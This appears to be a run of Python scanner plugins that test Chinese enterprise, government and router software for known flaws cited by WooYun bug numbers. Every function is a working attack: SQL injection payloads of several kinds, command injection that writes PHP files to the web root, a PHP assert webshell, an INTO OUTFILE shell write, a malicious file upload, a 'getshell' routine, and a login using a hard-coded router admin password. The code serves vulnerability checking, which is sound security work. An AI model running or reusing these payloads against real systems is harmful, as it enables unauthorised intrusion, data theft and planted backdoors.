def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) hh = hackhttp.hackhttp() true_url = self.target + '/E-mobile/diarydo.php?diff=reply&diary_id=1' start_time1 = time.time() code1, head1, body1, errcode1, fina_url1 = hh.http(true_url) true_time = time.time() - start_time1 flase_url = self.target + \ '/E-mobile/diarydo.php?diff=reply&diary_id=sleep(5)' start_time2 = time.time() code2, head2, body2, errcode2, fina_url2 = hh.http(flase_url) flase_time = time.time() - start_time2 if code1 == 200 and code2 == 200 and flase_time > true_time and flase_time > 5: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # Refer:http://www.wooyun.org/bugs/wooyun-2014-060988 hh = hackhttp.hackhttp() url = self.target + "/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false¶m_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute" payload1 = "TreeSelectedID=&TableSelectedID=&refSearchProp=unit_code&refSearchPropLbl=%E5%8D%95%E4%BD%8D%E7%BC%96%E7%A0%81&refSearchOper=%3D&refSearchOperLbl=%E7%AD%89%E4%BA%8E&refSearchValue=%27or+1%3D1--" code1, head1, res1, errcode1, _ = hh.http(url, post=payload1) payload2 = "TreeSelectedID=&TableSelectedID=&refSearchProp=unit_code&refSearchPropLbl=%E5%8D%95%E4%BD%8D%E7%BC%96%E7%A0%81&refSearchOper=%3D&refSearchOperLbl=%E7%AD%89%E4%BA%8E&refSearchValue=%27or+1%3D2--" code2, head2, res2, errcode2, _ = hh.http(url, post=payload2) if (code1 == 200 and code2 == 200): rm1 = re.findall("<tr\s*id='sortItem'", res1) rm2 = re.findall("<tr\s*id='sortItem'", res2) if (len(rm1) != len(rm2)): #security_hole('sqlinject:POST [refSearchValue=>\'or 1=1]'+url) self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip( '/') + '/' + (self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # refer:http://www.wooyun.org/bugs/wooyun-2010-090874 # refer:http://www.wooyun.org/bugs/wooyun-2010-090451 hh = hackhttp.hackhttp() payloads = [ '/showkbxx.asp?id=-1', '/shownews.asp?id=-1' ] getdata1 = '%20OR%201%3D1' getdata2 = '%20OR%201%3D2' for payload in payloads: code1, head, res1, errcode, _ = hh.http( self.target + payload + getdata1) code2, head, res2, errcode, _ = hh.http( self.target + payload + getdata2) m1 = re.findall('<div', res1) m2 = re.findall('<div', res2) if code1 == 200 and code2 == 200 and m1 != m2: #security_hole(arg + payload + " :sql Injection") self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format( target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # refer:http://www.wooyun.org/bugs/wooyun-2010-078982 hh = hackhttp.hackhttp() payloads = [ '/PubInfo/ldxx.asp?QryId=1', '/web/PubInfo/ldxx.asp?QryId=1' ] getdata1 = '%27%20or%20%271%27%3D%271' getdata2 = '%27%20or%20%271%27%3D%272' for payload in payloads: url1 = self.target + payload + getdata1 url2 = self.target + payload + getdata2 code1, head, res1, errcode, _ = hh.http(url1) code2, head, res2, errcode, _ = hh.http(url2) if code1 == 500 and code2 == 200 and 'gray.gif' not in res1 and 'gray.gif' in res2: #security_hole(arg + payload + ' :found sql Injection') self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # ref http://www.wooyun.org/bugs/wooyun-2015-0117616 hh = hackhttp.hackhttp() arg = self.target payload = '/acc/network/redial_pppoe.php?wan=%20|%20echo%20testvul%20>%20test.php%20|' target = arg + payload code, head, res, errcode, _ = hh.http(target) payload = '/acc/network/test.php' target = arg + payload code, head, res, errcode, _ = hh.http(target) if 'testvul' in res: # security_hole(target) self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # refer:http://www.wooyun.org/bugs/wooyun-2010-0107850 hh = hackhttp.hackhttp() payload = '/checklogin.asp' postdata1 = 'uid=11111111&pwd=11111&imageField2.x=32&imageField2.y=7' postdata2 = 'uid=11111111%27%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&pwd=11111&imageField2.x=32&imageField2.y=7' url = self.target + payload t1 = time.time() code1, head, res1, errcode1, _ = hh.http(url, postdata1) t2 = time.time() code2, head, res2, errcode2, _ = hh.http(url, postdata2) t3 = time.time() errtime = t3 - t2 truetime = t2 - t1 if errtime - truetime > 3: # security_hole(arg+payload) self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # refer:http://www.wooyun.org/bugs/wooyun-2010-0116142 hh = hackhttp.hackhttp() payloads = [ '/modules/pdflist.aspx?info_id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%28113%29%2bCHAR%2898%29%2bCHAR%28112%29%2bCHAR%28107%29%2bCHAR%28113%29%2bCHAR%28102%29%2bCHAR%2897%29%2bCHAR%2876%29%2bCHAR%28113%29%2bCHAR%28109%29%2bCHAR%2872%29%2bCHAR%2888%29%2bCHAR%28108%29%2bCHAR%28117%29%2bCHAR%2877%29%2bCHAR%28113%29%2bCHAR%28112%29%2bCHAR%28120%29%2bCHAR%28113%29%2bCHAR%28113%29%2CNULL%2CNULL%2CNULL--', '/modules/pdflist.aspx?info_id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28102%29%7C%7CCHR%2897%29%7C%7CCHR%2876%29%7C%7CCHR%28113%29%7C%7CCHR%28109%29%7C%7CCHR%2872%29%7C%7CCHR%2888%29%7C%7CCHR%28108%29%7C%7CCHR%28117%29%7C%7CCHR%2877%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%2CNULL%2CNULL%2CNULL%20FROM%20DUAL--' ] for payload in payloads: url = self.target + payload code, head, res, errcode, _ = hh.http(url) if 'qbpkqfaLqmHXluMqpxqq' in res: #security_hole(arg + 'modules/pdflist.aspx?info_id=1') self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # refer:http://www.wooyun.org/bugs/wooyun-2010-0132188 hh = hackhttp.hackhttp() arg = self.target payload = '/opac/ckmarc.jsp' postdata1 = 'kzh=zyk0040640%27%20AND%201%3D1%20AND%20%27jyNX%27%3D%27jyNX' postdata2 = 'kzh=zyk0040640%27%20AND%201%3D2%20AND%20%27jyNX%27%3D%27jyNX' code1, head, res1, errcode, _ = hh.http(arg + payload, postdata1) code2, head, res2, errcode, _ = hh.http(arg + payload, postdata2) m1 = re.findall('</td>', res1) m2 = re.findall('</td>', res2) if code1 == 200 and code2 == 200 and m1 != m2: #security_hole(arg+payload+' :found sql Injection') self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # http://www.wooyun.org/bugs/wooyun-2010-0129390 # http://www.wooyun.org/bugs/wooyun-2010-0129392 hh = hackhttp.hackhttp() # SQL注入 SQL Server 注入 arg = self.target payloads = [ #self.target + '/csccmis/jctxx.asp?jcid=1%20and%201=@@version%20--', #self.target + '/csccmis/jczp.asp?jcid=1%20or%201=@@version%20--', #self.target + '/csccmis/jczpOld.asp?jcid=1%20or%201=@@version%20--', arg + '/csccmise/jczp.asp?jcid=1%20or%201=@@version%20--', arg + '/csccmise/jctxx.asp?jcid=1%20or%201=@@version%20--', #arg + 'csccmissm/jctxx.asp?jcid=1%20or%201=@@version%20--', #arg + 'csccmissm/jczp.asp?jcid=1%20or%201=@@version%20--', #arg + 'csccmissm/jczpOld.asp?jcid=1%20or%201=@@version%20--', ] for payload in payloads: code, head, res, err, _ = hh.http(payload) # print res if code != 0 and 'Microsoft SQL Server' in res: #security_hole('SQL injection: '+ payload) self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # info:http://www.wooyun.org/bugs/wooyun-2015-098450\http://www.wooyun.org/bugs/wooyun-2015-0134150 hh = hackhttp.hackhttp() arg = self.target payloads = ( # 入侵日志 '/cgi-pub/exportdata.cgi?type=1&begintime=20150101&endtime=20150102', # 系统日志 '/cgi-pub/exportdata.cgi?type=3&begintime=20150101&endtime=20150102', # 阻断日志 '/cgi-pub/exportdata.cgi?type=12&begintime=20150101&endtime=20151218' ) for payload in payloads: url = arg + payload code, head, res, errcode, _ = hh.http(url) if code == 200 and 'Attack Time' in res and 'Action' in res: # security_hole("铱迅web应用安全网关信息泄漏,参照:wooyun-2015-098450,wooyun-2015-0134150\n%s\n%s\n%s"%(exp1,exp2,exp3)) self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip( '/') + '/' + (self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # https://bugs.shuimugan.com/bug/view?bug_no=102603 hh = hackhttp.hackhttp() arg = self.target start_time1 = time.time() code1, head, res, errcode, _ = hh.http(arg) true_time = time.time() - start_time1 start_time2 = time.time() url = arg + "/DeMandTest.aspx?B=0&Month=1&PLCNr=5;WAITFOR%20DELAY%20'0:0:6'--&MeterID=1" code2, head, res, errcode, _ = hh.http(url) flase_time = time.time() - start_time2 if code1 == 200 and code2 == 500 and flase_time > true_time and flase_time > 5 and true_time < 2: # security_hole(url) self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format( target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) hh = hackhttp.hackhttp() anpayloads = [ '/pubinfo/Moreysxk.asp?Qryxmmc=111', '/web/pubinfo/Moreysxk.asp?Qryxmmc=111' ] angetdata = '%25%27%20UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2Csys.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%271234%27%29%29%2C6%2C7%2C8%2C9--%20%26Qryxkzh%3D1' for anpayload in anpayloads: url = self.target + anpayload + angetdata code, head, res, errcode, _ = hh.http(url) if code == 200 and '0x81dc9bdb52d04dc20036dbd8313ed055' in res: #security_hole(arg + anpayload + ' :found sql Injection') self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # info:http://www.wooyun.org/bugs/wooyun-2015-0140998 hh = hackhttp.hackhttp() url = self.target + '/direct/polling/CommandsPolling.php' postdata = "command=ping&filename=&cmdParam=qq.com,ifconfig" code, head, res, errcode, _ = hh.http(url, post=postdata) filepath = res[res.find('/'):res.find('qq.com') + 6].replace( '\\', '') postdata = "command=ping&filename=%s&cmdParam=qq.com,ifconfig" % filepath code, head, res, errcode, _ = hh.http(url, post=postdata) if code == 200 and 'Ethernet HWaddr' in res: # security_hole(url) self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # ref http://www.wooyun.org/bugs/wooyun-2015-0122599 hh = hackhttp.hackhttp() payload = '/search.php?mid=1&action=search&keyword=asd&postdb[city_id]=../../admin/hack&hack=jfadmin&action=addjf&Apower[jfadmin_mod]=1&fid=1&title=${@assert($_POST[yu])}' url1 = self.target + payload url2 = self.target + '/do/jf.php' post = 'yu=phpinfo();' code, head, res, errcode, _ = hh.http(url1) code, head, res, errcode, _ = hh.http(url2, post=post) if code == 500 and 'phpinfo()' in res and 'AUTH_PASSWORD' in res: # security_hole(url2) self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # refer: http://www.wooyun.org/bugs/wooyun-2010-0128007 hh = hackhttp.hackhttp() arg = self.target md5_1 = 'c4ca4238a0b923820dcc509a6f75849b' filename = 'wtFtw' + str(random.randint(111, 999)) + '.php' payload = '[group]:[1]|[groupid]:[1 union select 0x3c3f706870206563686f206d64352831293b203f3e,2,3,4,5,6,7,8 into outfile \'../webroot/{filename}\']'.format( filename=filename) payload = base64.b64encode(payload) # print payload url = arg + '/inc/group_user_list/group_xml.php?par=' + payload code, head, res, err, _ = hh.http(url) if code == 200: code, head, res, err, _ = hh.http(arg + '/' + filename) if (code == 200) and (md5_1 in res): #security_hole('weaver e-office getshell: ' + url) self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) hh = hackhttp.hackhttp() arg = self.target port = 23 time = 5 user = '******' password = '******'%s\') = %u' finish = '->' try: t = telnetlib.Telnet(arg, port, timeout=time) t.write(user + '\n') t.read_until('password: '******'\n') str1 = t.read_until(finish) t.write("?\n") str = t.read_until(finish) t.close() if ('->' in str) and ('exec' in str): # security_hole(arg) self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: pass except Exception as e: self.output.info('执行异常{}'.format(e))
def exploit(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # wooyun-2014-077033 hh = hackhttp.hackhttp() arg = self.target path = '/manager/config_SSO.php' target = arg + path code, head, res, errcode, _ = hh.http(target) if code == 200 and ('os_name' in res) and ('telnet_os_login_mes' in res): #security_warning("Unauthorized access"+target) shell_data = "type_mode=5201314<?php echo md5(3.14);?>&os_name=HP_11&config_flag=1" code, head, res, errcode, _ = hh.http(target, shell_data) exec_data = "os_name=a%20|cp%20/usr/local/keyou/Config/sso/HP_11/Template.cnf%20/usr/local/apache2/htdocs/project/www/sh.php%20|&config_flag=1" code, head, res, errcode, _ = hh.http(target, exec_data) target = arg + '/sh.php' code, head, res, errcode, _ = hh.http(target) if code == 200 and '4beed3b9c4a886067de0e3a094246f78' in res: # security_hole("getshell:"+target) self.output.report( self.vuln, '发现{target}存在{name}漏洞,获取shell为:{shell}'.format( target=self.target, name=self.vuln.name, shell=target)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip( '/') + '/' + (self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # refer: http://www.wooyun.org/bugs/wooyun-2014-058932 # refer: http://www.wooyun.org/bugs/wooyun-2014-058971 # refer: http://www.wooyun.org/bugs/wooyun-2014-058988 # refer: http://www.wooyun.org/bugs/wooyun-2014-077810 hh = hackhttp.hackhttp() arg = self.target # 报错注入 payloads = [ arg + '/WebPages/history.php?uid=1%20and%20extractvalue(0x1,concat(0x23,(select%20md5(1))))', arg + '/WebPages/applyhardware.php?action=applyhardware&hard_user=test%2527%20and%20extractvalue(0x1,concat(0x23,(select%20md5(1))))%23', arg + '/WebPages/singlelogin.php?loginId=1%20and%20extractvalue(0x1,concat(0x23,(select%20md5(1))))%23&submit=t', ] md5_1 = 'c4ca4238a0b923820dcc509a6f75849' for payload in payloads: code, head, res, err, _ = hh.http(payload) if code == 200 and md5_1 in res: #security_hole('SQL injection: ' + payload) self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format( target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # ref http://www.wooyun.org/bugs/wooyun-2015-0117621 hh = hackhttp.hackhttp() arg = self.target payload = "/acc/debug/bytecache_run_action.php?action=2&engine=%20|%20echo%20testvultest3%20>%20a1.php%20|%20&ipfilter=10" target = arg + payload code, head, res, errcode, _ = hh.http(target) payload = '/acc/debug/a1.php' target = arg + payload code, head, res, errcode, _ = hh.http(target) if 'testvultest3' in res: # security_hole(target) self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # Refer:http://www.wooyun.org/bugs/wooyun-2014-049406 hh = hackhttp.hackhttp() arg = self.target # get the Frm_Logintoken code1, head1, res1, errcode1, finalurl1 = hh.http(arg) partten = re.compile( 'document\.getElementById\("Frm_Logintoken"\).value = "(\d{5,8})";' ) match = partten.search(res1) Frm_Logintoken = "" if match: Frm_Logintoken = match.group(1) url1 = arg + "/getpage.gch?pid=1001&logout=1" data = "Username=telecomadmin&Password=nE7jA%255m&Frm_Logintoken=" + Frm_Logintoken # proxy=('127.0.0.1',8080) code, head, res, errcode, finalurl = hh.http(arg, post=data) if code == 200 and "src=\"template.gch\"" in res: # security_hole("电信路由器配置不当,存在超级管理员账号登陆"+arg) self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # refer:http://www.wooyun.org/bugs/wooyun-2010-0107187 hh = hackhttp.hackhttp() arglist = matchurl(self.target) for arg in arglist: payload1 = '?nowlx=m%27%20or%20%271%27=%271' payload2 = '?nowlx=m%27%20or%20%271%27=%272' url1 = self.target + payload1 url2 = self.target + payload2 code1, head, res1, errcode, _ = hh.http(url1) code2, head, res2, errcode, _ = hh.http(url2) m1 = re.search('class="gray"', res1) m2 = re.search('class="gray"', res2) if code1 == 200 and code2 == 200 and m1 and m2 == None: #security_hole(arg +'?nowlx=m'+' :found sql Injection') self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip( '/') + '/' + (self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) hh = hackhttp.hackhttp() url = self.target + \ "/feedback/uploadfile_save.php?met_file_format=pphphp&met_file_maxsize=9999&lang=metinfo" raw = ''' POST /feedback/uploadfile_save.php?met_file_format=pphphp&met_file_maxsize=9999&lang=metinfo HTTP/1.1 Host: localhost Content-Length: 423 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: null Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryE1toBNeESf6p0uXQ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: PHPSESSID=hfqa37uap92gdaoc2nsco6g0n1 ------WebKitFormBoundaryE1toBNeESf6p0uXQ Content-Disposition: form-data; name="fd_para[1][para]" filea ------WebKitFormBoundaryE1toBNeESf6p0uXQ Content-Disposition: form-data; name="fd_para[1][type]" 5 ------WebKitFormBoundaryE1toBNeESf6p0uXQ Content-Disposition: form-data; name="filea"; filename="test.php" Content-Type: application/x-php <?php echo md5(1); ?> ------WebKitFormBoundaryE1toBNeESf6p0uXQ-- ''' # proxy=('127.0.0.1',8080) code, head, res, errcode, finalurl = hh.http(url, raw=raw) # upload file # get upload file name name = int(time.time()) for i in range(100, 10000): filename = name + i url = self.target + '/upload/file/%s.php' % (str(filename)) # print url code, head, res, errcode, finalurl = hh.http(url) if code == 200 and "c4ca4238a0b923820dcc509a6f75849b" in res: #security_hole('file upload Vulnerable:'+arg+"feedback/uploadfile_save.php?met_file_format=pphphp&met_file_maxsize=9999&lang=metinfo") self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format( target=self.target, name=self.vuln.name)) break except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # Referer : http://www.wooyun.org/bugs/wooyun-2010-066850 hh = hackhttp.hackhttp() payloads = [['/status_dev_info_t.gch', 'Frm_CarrierName'], ['/manager_dev_config_t.gch', 'ConfigUpload'], ['/wlan_security.gch', 'PreSharedKey'], ['/manager_log_conf_t.gch', 'Transfer_meaning']] for p in payloads: url = self.target + p[0] code, head, res, errcode, _ = hh.http(url) if p[1] in res: # security_hole(url) self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) hh = hackhttp.hackhttp() payloads = [ "/kingdee/Template/TemplateEdit.jsp?RecordID=1'%20WAITFOR%20DELAY%20'0:0:0'--%20", "/kingdee/Template/TemplateSave.jsp?FileName=1'%20WAITFOR%20DELAY%20'0:0:0'--%20", "/kingdee/DocumentEdit.jsp?RecordID=1'%20WAITFOR%20DELAY%20'0:0:0'--%20&UserName=1", "/kingdee/DocumentSave.jsp?RecordID=1'%20WAITFOR%20DELAY%20'0:0:0'--%20&Template=1&Subject=1&Author=1&FileDate=1&FileType=1&HTMLPath=1", "/kingdee/DocumentShow.jsp?Template=1'%20WAITFOR%20DELAY%20'0:0:0'--%20&UserName=1" ] for p in payloads: url1 = self.target + p url2 = self.target + p.replace("0:0:0", "0:0:5") t1 = time.time() code1, head1, res1, err1, _1 = hh.http(url1) t2 = time.time() code2, head2, res2, err2, _2 = hh.http(url2) t3 = time.time() if code1 != 0 and code2 != 0 and t3 - t2 - t2 + t1 > 3: #security_hole(url2 + "has time-based blind") self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) """ 该产品是用于:滑坡监测,尾矿库安全监测,水库大坝安全监测,桥梁健康监测,沉降塌陷监测,建筑监测,机械精密控制,精准农业导航,和精密定位的GNSS接收机。 POC Name : 中海达VNet6专业型参考站接收机 SQL注入 使用默认的账号密码(zhdgps/zhdgps) """ # 几乎都有这个漏洞?????????????? hh = hackhttp.hackhttp() arg = self.target payload1 = '/index.php?lang=en&pid=200%20and%201011-1010=1' # 1011-1010 运算 payload2 = '/index.php?lang=en&pid=200%20and%201011-1010=2' url1 = arg + payload1 url2 = arg + payload2 code1, head, res1, errcode, _ = hh.http(url1) code2, head, res2, errcode, _ = hh.http(url2) if (code1 == 200) and res1 not in res2: #security_hole(url1 + ' SQL injection') self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) hh = hackhttp.hackhttp() payloads = [ '/index.php?s=/home/shopcart/getPricetotal/tag/1%27' '/index.php?s=/home/shopcart/getpriceNum/id/1%27' '/index.php?s=/home/user/cut/id/1%27' '/index.php?s=/home/service/index/id/1%27' '/index.php?s=/home/pay/chongzhi/orderid/1%27' '/index.php?s=/home/pay/index/orderid/1%27' '/index.php?s=/home/order/complete/id/1%27' '/index.php?s=/home/order/detail/id/1%27' '/index.php?s=/home/order/cancel/id/1%27' ] for payload in payloads: verify_url = self.target + payload code, head, res, errcode, _ = hh.http(verify_url) if '1064 You have' in res: #security_hole("infomation leak:"+poc) self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) hh = hackhttp.hackhttp() data = 'submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&nowait=1&ping_size=32&ping_times=5&ping_ip=ls' url = self.target + '/apply.cgi' code, head, res, errcode, _ = hh.http( url, data, Cookie= 'wys_userid=admin,wys_passwd=5982861B34B74E9A6DAD66A9895CDFFF') if 'X2000' in res and 'You must input an IP Address or Domain Name' in res: #security_hole('Linksys X2000 Command Execution AND Unauthorized access!') self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # refer: http://www.wooyun.org/bugs/wooyun-2014-058987 hh = hackhttp.hackhttp() arg = self.target md5_1 = 'c4ca4238a' # cookie注入 cookie = 'reachstone_uid=1 and extractvalue(0x1,concat(0x23,md5(1)))' url = arg + '/include/authrp.php' code, head, res, err, _ = hh.http(url, cookie=cookie) if (code == 200) and (md5_1 in res): #security_hole('SQL Injection: {url} Cookie: {cookie}'.format(url=url,cookie=cookie)) self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
